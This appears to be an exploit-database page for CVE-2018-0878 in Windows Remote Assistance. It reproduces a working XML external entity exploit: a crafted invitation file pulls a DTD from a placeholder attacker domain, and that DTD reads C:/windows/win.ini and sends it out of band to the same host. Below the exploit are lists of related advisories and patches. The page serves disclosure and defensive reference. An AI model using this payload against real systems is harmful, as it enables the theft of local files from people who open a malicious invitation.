Lucene search
Nabeel AhmedPACKETSTORM:146934HistoryMar 28, 2018 - 12:00 a.m.
Microsoft Windows Remote Assistance XXE Injection
2018-03-2800:00:00
Nabeel Ahmed
packetstormsecurity.com
32
0.086 Low
EPSS
Percentile
93.8%
`# Exploit Title: Microsoft Windows Remote Assistance XXE
# Date: 27/03/2018
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 (x64), Windows 10 (x64)
# CVE : CVE-2018-0878
# Category: Remote Exploits
Invitation.msrcincident
------------------------
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://<yourdomain.com>/xxe.xml">
%remote;%root;%oob;]>
xxe.xml
------------------------
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://<yourdomain.com>/?%payload;'> ">
Reference: https://krbtgt.pw/windows-remote-assistance-xxe-vulnerability/
Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com)
`
Related
checkpoint_advisories
checkpoint_advisories
zdi
zdi
prion
prion
Information disclosure
2018-03-14 17:29:00
mskb
mskb
March 13, 2018—KB4088879 (Security-only update)
2018-03-13 07:00:00
March 13, 2018—KB4088880 (Security-only update)
2018-03-13 07:00:00
cve
cve
CVE-2018-0878
2018-03-14 17:29:00
mscve
mscve
Windows Remote Assistance Information Disclosure Vulnerability
2018-03-13 07:00:00
cvelist
cvelist
CVE-2018-0878
2018-03-14 00:00:00
thn
thn
Windows Remote Assistance Exploit Lets Hackers Steal Sensitive Files
2018-03-20 18:56:00
zdt
zdt
exploitpack
exploitpack
Microsoft Windows Remote Assistance - XML External Entity Injection
2018-03-28 00:00:00
symantec
symantec
exploitdb
exploitdb
Microsoft Windows Remote Assistance - XML External Entity Injection
2018-03-28 00:00:00
nessus
nessus
Security Updates for Windows Server 2008 (March 2018)
2018-03-13 00:00:00
kaspersky
kaspersky
KLA11778 Multiple vulnerabilities in Microsoft Products (ESU)
2018-03-13 00:00:00
KLA11207 Multiple vulnerabilities in Microsoft Windows
2018-03-13 00:00:00
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4088875)
2018-03-14 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4088876)
2018-03-14 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4088786)
2018-03-14 00:00:00
trendmicroblog
trendmicroblog
talosblog
talosblog
Microsoft Patch Tuesday - March 2018
2018-03-13 14:38:00